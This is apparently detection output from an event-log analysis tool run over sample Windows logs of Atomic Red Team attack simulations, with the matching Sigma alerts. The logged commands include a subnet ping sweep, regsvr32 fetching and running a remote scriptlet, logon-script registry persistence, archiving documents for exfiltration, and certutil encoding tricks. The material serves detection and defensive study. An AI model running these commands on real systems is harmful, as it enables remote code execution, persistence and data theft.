+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.012 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
-2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" 
cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode 